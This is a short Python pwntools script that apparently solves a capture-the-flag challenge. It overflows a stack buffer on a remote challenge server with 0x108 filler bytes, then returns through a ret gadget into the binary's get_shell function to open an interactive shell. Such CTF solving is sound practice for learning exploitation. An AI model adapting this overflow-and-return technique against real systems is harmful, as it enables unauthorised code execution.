#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore")
exe = ELF("./chale")
# context.log_level='debug'
# p = remote("c64-chatggt.hkcert24.pwnable.hk", 1337)
p = remote("c64-chatggt.hkcert24.pwnable.hk", 1337, ssl=True)
# p = process([exe.path])
def gdbs():
    context.terminal = ["foot"]
    gdb.attach(p, gdbscript="""

               """)
    # p = gdb.debug([exe.path],"""
    #
    #                 """)

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)

# gdbs()
input()
sla(":",b"a"*0x108+p64(0x000000000040101a)+p64(exe.sym.get_shell))
sla(":","EXIT")







p.interactive()
# good luck pwning :)

